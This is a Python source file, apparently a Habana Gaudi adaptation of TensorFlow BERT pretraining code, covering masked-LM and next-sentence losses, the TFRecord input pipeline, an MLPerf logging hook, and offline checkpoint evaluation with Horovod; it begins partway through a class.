self.count = 0 # global step counter
self.block_started = False
self.enable_device_warmup = enable_device_warmup
def after_create_session(self, session, coord):
if self.enable_device_warmup:
graph = session.graph
variables = list(filter(lambda op: op.type=='VarHandleOp', graph.get_operations()))
variable_names = [op.name for op in variables]
variable_readers = [name + '/Read/ReadVariableOp:0' for name in variable_names]
variable_assigners = [name + '/Assign' for name in variable_names]
variable_assigners_input1_name = [graph.get_operation_by_name(name + '/Assign').inputs[1].name for name in variable_names]
variable_name_to_assigner_input1_name = dict(zip(variable_names, variable_assigners_input1_name))
# save state_dict
state_dict = dict(zip(variable_names, variable_readers))
state_dict = session.run(fetches=state_dict)
# device warmup
fetches = [train_op_name, 'total_loss:0', 'global_step/add:0', 'Merge/MergeSummary:0', 'update_step:0', 'learning_rate:0', 'nsp_loss:0', 'mlm_loss:0', 'step_update:0']
for _ in range(self.num_accumulation_steps):
result = session.run(fetches)
session.run('global_step/add:0')
session.run('global_step/add:0')
session.run('global_step/add:0')
assert result[-1] == True
# restore data loader iterator
session.run(graph.get_operation_by_name('MakeIterator'))
# load state_dict
feed_dict = dict()
for key in variable_names:
feed_dict[variable_name_to_assigner_input1_name[key]] = state_dict[key]
session.run(fetches=variable_assigners, feed_dict=feed_dict)
self.mllogger.start(key=self.mllog.constants.RUN_START)
self.run_start_timestamp=time.time()
def before_run(self, run_context):
if self.block_started == False:
#self.checkpoint_timestamp_dict[self.cycle_index]=int(time.time()*1e3)
self.mllogger.start(key=self.mllog.constants.BLOCK_START, value=self.cycle_index + 1, metadata={self.mllog.constants.FIRST_EPOCH_NUM: int(self.cycle_index * self.num_steps_between_eval), self.mllog.constants.EPOCH_COUNT: int(self.num_steps_between_eval)})
self.block_started = True
if self.num_accumulation_steps <= 1:
return tf.estimator.SessionRunArgs(fetches=['step_update:0']) # global_step
else:
return tf.estimator.SessionRunArgs(fetches=['step_update:0', 'update_step:0']) # global_step, update_step
def after_run(self, run_context, run_values):
if self.num_accumulation_steps <=1:
self.global_step = run_values.results
update_step = True
else:
self.global_step, update_step = run_values.results
if update_step:
self.count += 1
if self.count >= self.schedule[self.cycle_index]:
self.mllogger.end(key=self.mllog.constants.BLOCK_STOP, value=self.cycle_index + 1, metadata={self.mllog.constants.FIRST_EPOCH_NUM: int(self.cycle_index * self.num_steps_between_eval)})
self.chpt_timestamp_dict[self.cycle_index + 1]=time.time()
self.checkpoint_timestamp_dict[self.cycle_index + 1]=int(time.time()*1e3)
self.block_stop_timestamp_dict[self.cycle_index + 1]=time.time()
self.cycle_index += 1
self.count = 0
self.block_started = False
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps,
use_one_hot_embeddings, weight_decay_rate, beta_1, beta_2, epsilon, power):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.compat.v1.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.compat.v1.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings,
compute_type=tf.float16 if FLAGS.manual_fp16 else tf.float32)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids,
masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
masked_lm_loss = tf.identity(masked_lm_loss, name="mlm_loss")
next_sentence_loss = tf.identity(next_sentence_loss, name="nsp_loss")
total_loss = masked_lm_loss + next_sentence_loss
total_loss = tf.identity(total_loss, name='total_loss')
tvars = tf.compat.v1.trainable_variables()
initialized_variable_names = {}
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
          tf.compat.v1.logging.info("  %d :: name = %s, shape = %s%s", hvd.rank() if horovod_enabled() else 0, var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps,
FLAGS.manual_fp16, FLAGS.amp, FLAGS.num_accumulation_steps, FLAGS.optimizer_type, FLAGS.allreduce_post_accumulation, FLAGS.init_loss_scale, weight_decay_rate, beta_1, beta_2, epsilon, power)
global train_op_name
train_op_name = train_op.name
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
input=masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.compat.v1.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.compat.v1.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
input=next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.compat.v1.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.compat.v1.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metric_ops = metric_fn(
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
loss=total_loss,
eval_metric_ops=eval_metric_ops)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.compat.v1.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.compat.v1.variable_scope("transform"):
input_tensor = tf.compat.v1.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.compat.v1.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.compat.v1.zeros_initializer())
logits = tf.matmul(tf.cast(input_tensor, tf.float32), output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits - tf.reduce_max(logits, keepdims=True, axis=-1), axis=-1)
#log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(input_tensor=log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(input_tensor=label_weights * per_example_loss)
denominator = tf.reduce_sum(input_tensor=label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.compat.v1.variable_scope("cls/seq_relationship"):
output_weights = tf.compat.v1.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.compat.v1.get_variable(
"output_bias", shape=[2], initializer=tf.compat.v1.zeros_initializer())
logits = tf.matmul(tf.cast(input_tensor, tf.float32), output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits - tf.reduce_max(logits, keepdims=True, axis=-1), axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(input_tensor=one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(input_tensor=per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def input_fn_builder(input_files,
batch_size,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
"""Creates an `input_fn` closure to be passed to Estimator."""
def input_fn():
"""The actual input function."""
name_to_features = {
"input_ids":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.io.FixedLenFeature([1], tf.int64),
}
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
if horovod_enabled() and FLAGS.is_dist_eval_enabled: d = d.shard(hvd_size(), hvd_rank())
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.data.experimental.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
# out-of-range exceptions.
if horovod_enabled(): d = d.shard(hvd_size(), hvd_rank())
d = d.repeat()
# We must `drop_remainder` on training because the TPU requires fixed
# size dimensions. For eval, we assume we are evaluating on the CPU or GPU
    # and we *don't* want to drop the remainder, otherwise we won't cover
# every sample.
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True if is_training else False))
return d
return input_fn
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.io.parse_single_example(serialized=record, features=name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.cast(t, dtype=tf.int32)
example[name] = t
return example
def main(_):
os.environ["TF_XLA_FLAGS"] = "--tf_xla_enable_lazy_compilation=false" #causes memory fragmentation for bert leading to OOM
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
dllogging = dllogger_class.dllogger_class(FLAGS.dllog_path)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
  # In a multi-node scenario, each HLS machine must have a checkpoint directly in the output_dir (read by Phase 2).
  # Exactly one worker per machine has comm_local_rank() == 0, and that worker writes its checkpoints there.
  # All other workers keep their checkpoints in sub-directories.
if horovod_enabled() and comm_local_rank() != 0:
FLAGS.output_dir = os.path.join(FLAGS.output_dir, f'worker_{hvd_rank()}')
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.io.gfile.makedirs(FLAGS.output_dir)
input_files = []
for input_file_dir in FLAGS.input_files_dir.split(","):
input_files.extend(tf.io.gfile.glob(os.path.join(input_file_dir, "*")))
if FLAGS.horovod and len(input_files) < hvd.size():
tf.compat.v1.logging.warning("Input files count lower then expected. Using single file for OVERFIT test.")
input_files = [input_files[0] for i in range(hvd.size())]
if FLAGS.amp and FLAGS.manual_fp16:
raise ValueError("AMP and Manual Mixed Precision Training are both activated! Error")
is_per_host = tf.compat.v1.estimator.tpu.InputPipelineConfig.PER_HOST_V2
# The Scoped Allocator Optimization is enabled by default unless disabled by a flag.
if condition_env_var('TF_DISABLE_SCOPED_ALLOCATOR', default=False):
session_config = tf.compat.v1.ConfigProto()
else:
from tensorflow.core.protobuf import rewriter_config_pb2 # pylint: disable=import-error
session_config = tf.compat.v1.ConfigProto()
session_config.graph_options.rewrite_options.scoped_allocator_optimization = rewriter_config_pb2.RewriterConfig.ON
enable_op = session_config.graph_options.rewrite_options.scoped_allocator_opts.enable_op
del enable_op[:]
enable_op.append("HorovodAllreduce")
if FLAGS.horovod:
session_config.gpu_options.visible_device_list = str(hvd.local_rank())
if hvd.rank() == 0:
tf.compat.v1.logging.info("***** Configuaration *****")
for key in FLAGS.__flags.keys():
tf.compat.v1.logging.info(' {}: {}'.format(key, getattr(FLAGS, key)))
tf.compat.v1.logging.info("**************************")
# config.gpu_options.per_process_gpu_memory_fraction = 0.7
if FLAGS.use_xla:
session_config.graph_options.optimizer_options.global_jit_level = tf.compat.v1.OptimizerOptions.ON_1
session_config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.NO_MEM_OPT
if FLAGS.amp:
tf.compat.v1.enable_resource_variables()
run_config = tf.estimator.RunConfig(
model_dir=FLAGS.output_dir,
session_config=session_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=19,
save_summary_steps=FLAGS.save_summary_steps,
log_step_count_steps=1)
if FLAGS.optimizer_type == "lamb":
weight_decay_rate=0.01
beta_1=0.9
beta_2=0.999
epsilon=1e-6
power = 1.0 #0.5
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate if not FLAGS.horovod else FLAGS.learning_rate*hvd_size(),
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_one_hot_embeddings=False, weight_decay_rate=weight_decay_rate, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, power=power)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
batch_size_per_node = FLAGS.train_batch_size * FLAGS.num_accumulation_steps
global_batch_size = (hvd.size() if FLAGS.horovod else 1) * batch_size_per_node
write_hparams_v1(FLAGS.output_dir, {
'batch_size': FLAGS.train_batch_size,
'batch_size_per_pu': FLAGS.train_batch_size,
'batch_size_per_node': batch_size_per_node,
'global_batch_size': global_batch_size,
**{x: getattr(FLAGS, x) for x in FLAGS}
})
if FLAGS.do_train:
training_hooks = []
if horovod_enabled():
if os.environ.get("FORCE_WEIGHT_SYNC", "False").lower() in ["true", "1"]:
# Use this hook to allreduce trainable variables before the optimizer run
training_hooks.append(TrainableVarsAllreducingHookPreOpt(FLAGS.num_accumulation_steps))
train_log_hook = _LogSessionRunHook(
global_batch_size, FLAGS.num_accumulation_steps, dllogging,
FLAGS.display_loss_steps, FLAGS.save_checkpoints_steps, FLAGS.report_loss)
training_hooks.append(train_log_hook)
training_hooks.append(ExamplesPerSecondEstimatorHook(
batch_size=batch_size_per_node, output_dir=FLAGS.output_dir,
extra_metrics={'global_examples/sec': global_batch_size}))
mlperfhook = MLPerfHook(global_batch_size, FLAGS.num_accumulation_steps, FLAGS.num_train_steps, FLAGS.samples_between_eval,
weight_decay_rate, beta_1, beta_2, epsilon, power, FLAGS.enable_device_warmup)
training_hooks.append(mlperfhook)
tf.compat.v1.logging.info("***** Running training *****")
tf.compat.v1.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
batch_size=FLAGS.train_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
train_start_time = time.time()
estimator.train(input_fn=train_input_fn, hooks=training_hooks, max_steps=FLAGS.num_train_steps)
train_time_elapsed = time.time() - train_start_time
#do offline evaluation right after training for mlperf
tf.compat.v1.logging.info("***** Running offline evaluation right after training for mlperf *****")
converged = False
eval_start_time = time.time()
mlperf_chpt_timestamp_dict = mlperfhook.chpt_timestamp_dict
mlperf_run_start_timestamp = mlperfhook.run_start_timestamp
mlperf_checkpoint_timestamp_dict = mlperfhook.checkpoint_timestamp_dict
mlperf_mlloger = mlperfhook.mllogger
mlperf_mllog = mlperfhook.mllog
mlperf_block_stop_timestamp_dict = mlperfhook.block_stop_timestamp_dict
num_steps_between_eval = math.ceil(FLAGS.samples_between_eval / global_batch_size)
print("mlperf_run_start_timestamp={}".format(mlperf_run_start_timestamp))
print("mlperf_checkpoint_timestamp_dict={}".format(mlperf_checkpoint_timestamp_dict))
print("mlperf_block_stop_timestamp_dict={}".format(mlperf_block_stop_timestamp_dict))
chpt_file_path = FLAGS.output_dir + "/checkpoint"
chpt_files = []
with open(chpt_file_path, "r") as file:
for line in file:
tmp,chpt_step = line.split(":")
if tmp == 'all_model_checkpoint_paths':
step = int(chpt_step.strip().split("-")[1].strip('"'))
if step >0:
chpt_files.append(FLAGS.output_dir + '/'+ chpt_step.strip().strip('"'))
eval_files = []
for eval_file_dir in FLAGS.eval_files_dir.split(","):
eval_files.extend(tf.io.gfile.glob(os.path.join(eval_file_dir, "*")))
eval_input_fn = input_fn_builder(
input_files=eval_files,
batch_size=FLAGS.eval_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
eval_hooks = [LogEvalRunHook(FLAGS.eval_batch_size)]
if horovod_enabled() and FLAGS.is_dist_eval_enabled:
tf.compat.v1.logging.info("***** Running offline distributed evaluation for mlperf *****")
#need to shard the dataset!!!!
eval_samples = 10000 / hvd_size()
max_eval_steps = math.ceil(FLAGS.max_eval_steps / hvd_size())
for ckpt_ind,chpt_path in enumerate(chpt_files):
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
if FLAGS.stop_threshold:
partial_eval_masked_lm_accuracy = eval_results["masked_lm_accuracy"] * eval_samples
print("per rank masked_lm_accuracy={}".format(eval_results["masked_lm_accuracy"]))
partial_eval_masked_lm_accuracy_FP32=tf.cast(partial_eval_masked_lm_accuracy, tf.float32)
total_eval_masked_lm_accuracy_FP32 = hvd.allreduce(partial_eval_masked_lm_accuracy_FP32, op=hvd.Sum)
total_eval_masked_lm_accuracy_FP32 /= 10000.0
mlperf_mlloger.event(key=mlperf_mllog.constants.EVAL_ACCURACY,value=total_eval_masked_lm_accuracy_FP32.numpy(), time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1})
success = bool(total_eval_masked_lm_accuracy_FP32 >= FLAGS.stop_threshold)
print("average eval_masked_lm_accuracy_FP32={}".format(total_eval_masked_lm_accuracy_FP32))
if success:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=total_eval_masked_lm_accuracy_FP32.numpy(), time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'success'})
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_BENCHMARK, value=mlperf_mllog.constants.BERT)
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_ORG, value='Habana')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_DIVISION, value='closed')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_PLATFORM, value='gaudi-8')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_STATUS, value='onprem')
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total offline distributed evaluation time={} seconds".format(eval_time_elapsed))
if converged:
total_train_time_secs = (mlperf_block_stop_timestamp_dict[converge_block_idx] - mlperf_run_start_timestamp)
mlperf_run_stop_timestamp = mlperf_block_stop_timestamp_dict[converge_block_idx] + eval_time_elapsed
time_to_train_minutes = (total_train_time_secs + eval_time_elapsed) / 60
print("Total offline distributed evaluation time={} seconds".format(eval_time_elapsed))
print("Total time-to-train is {} minutes ( = pure training time {} minutes + pure evaluation time {} minutes), converged in {} blocks ".format(time_to_train_minutes, total_train_time_secs/60, eval_time_elapsed / 60, converge_block_idx))
else:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=total_eval_masked_lm_accuracy_FP32.numpy(),time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'fail'})
else:
tf.compat.v1.logging.info("***** Running offline NON-distributed evaluation for mlperf *****")
for ckpt_ind,chpt_path in enumerate(chpt_files):
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
mlperf_mlloger.event(key=mlperf_mllog.constants.EVAL_ACCURACY,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1})
print("per rank mlm accuracy={}".format(eval_results["masked_lm_accuracy"]))
if FLAGS.stop_threshold:
success = bool(eval_results["masked_lm_accuracy"] >= FLAGS.stop_threshold)
if horovod_enabled():
past_treshold = tf.cast(past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]), tf.float32)
global_past_treshold = tf.math.greater(
hvd.allreduce(past_treshold, op=hvd.Sum), tf.zeros(1, tf.float32))
if global_past_treshold.numpy():
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
else:
if past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]):
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total offline non-distributed evaluation time={} seconds".format(eval_time_elapsed))
if converged:
total_train_time_secs = (mlperf_block_stop_timestamp_dict[converge_block_idx] - mlperf_run_start_timestamp)
mlperf_run_stop_timestamp = mlperf_block_stop_timestamp_dict[converge_block_idx] + eval_time_elapsed
time_to_train_minutes = (total_train_time_secs + eval_time_elapsed) / 60
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'success'})
print("Total time-to-train is {} minutes ( = pure training time {} minutes + pure evaluation time {} minutes), converged in {} blocks ".format(time_to_train_minutes, total_train_time_secs/60, eval_time_elapsed / 60, converge_block_idx))
else:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'fail'})
if FLAGS.do_eval:
converged = False
num_steps_between_eval = math.ceil(FLAGS.samples_between_eval / global_batch_size)
eval_start_time = time.time()
#Stand-alone offline evaluation of multiple checkpoints
chpt_file_path = FLAGS.output_dir + "/checkpoint"
chpt_files = []
with open(chpt_file_path, "r") as file:
for line in file:
tmp,chpt_step = line.split(":")
if tmp == 'all_model_checkpoint_paths':
step = int(chpt_step.strip().split("-")[1].strip('"'))
if step > 0:
chpt_files.append(FLAGS.output_dir + '/'+ chpt_step.strip().strip('"'))
eval_files = []
for eval_file_dir in FLAGS.eval_files_dir.split(","):
eval_files.extend(tf.io.gfile.glob(os.path.join(eval_file_dir, "*")))
eval_input_fn = input_fn_builder(
input_files=eval_files,
batch_size=FLAGS.eval_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
eval_hooks = [LogEvalRunHook(FLAGS.eval_batch_size)]
if horovod_enabled() and FLAGS.is_dist_eval_enabled:
tf.compat.v1.logging.info("***** Running standalone offline distributed evaluation for mlperf *****")
#need to shard the dataset!!!!
eval_samples = 10000 / hvd_size()
max_eval_steps = math.ceil(FLAGS.max_eval_steps / hvd_size())
for chpt_path in chpt_files:
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
if FLAGS.stop_threshold:
partial_eval_masked_lm_accuracy = eval_results["masked_lm_accuracy"] * eval_samples
print("per rank masked_lm_accuracy={}".format(eval_results["masked_lm_accuracy"]))
partial_eval_masked_lm_accuracy_FP32=tf.cast(partial_eval_masked_lm_accuracy, tf.float32)
total_eval_masked_lm_accuracy_FP32 = hvd.allreduce(partial_eval_masked_lm_accuracy_FP32, op=hvd.Sum)
total_eval_masked_lm_accuracy_FP32 /= 10000.0
success = bool(total_eval_masked_lm_accuracy_FP32 >= FLAGS.stop_threshold)
print("average eval_masked_lm_accuracy_FP32={}".format(total_eval_masked_lm_accuracy_FP32))
if success:
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total stand-alone offline distributed evaluation time={} seconds".format(eval_time_elapsed))
else:
tf.compat.v1.logging.info("***** Running standalone offline NON-distributed evaluation for mlperf *****")
for chpt_path in chpt_files:
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
print("per rank mlm accuracy={}".format(eval_results["masked_lm_accuracy"]))
if FLAGS.stop_threshold:
success = bool(eval_results["masked_lm_accuracy"] >= FLAGS.stop_threshold)
if horovod_enabled():
past_threshold = tf.cast(past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]), tf.float32)
global_past_threshold = tf.math.greater(
hvd.allreduce(past_threshold, op=hvd.Sum), tf.zeros(1, tf.float32))
if global_past_threshold.numpy():
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
else:
if past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]):
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total stand-alone offline non-distributed evaluation time={} seconds".format(eval_time_elapsed))
if __name__ == "__main__":
init_flags()
print("*****************************************")
print("Arguments passed to this program: run_pretraining.")
for key in FLAGS.__flags.keys():
print("{} = {}".format(key, getattr(FLAGS,key)))
if FLAGS.horovod:
hvd_init()
load_habana_module()
flags.mark_flag_as_required("input_files_dir")
if FLAGS.do_eval:
flags.mark_flag_as_required("eval_files_dir")
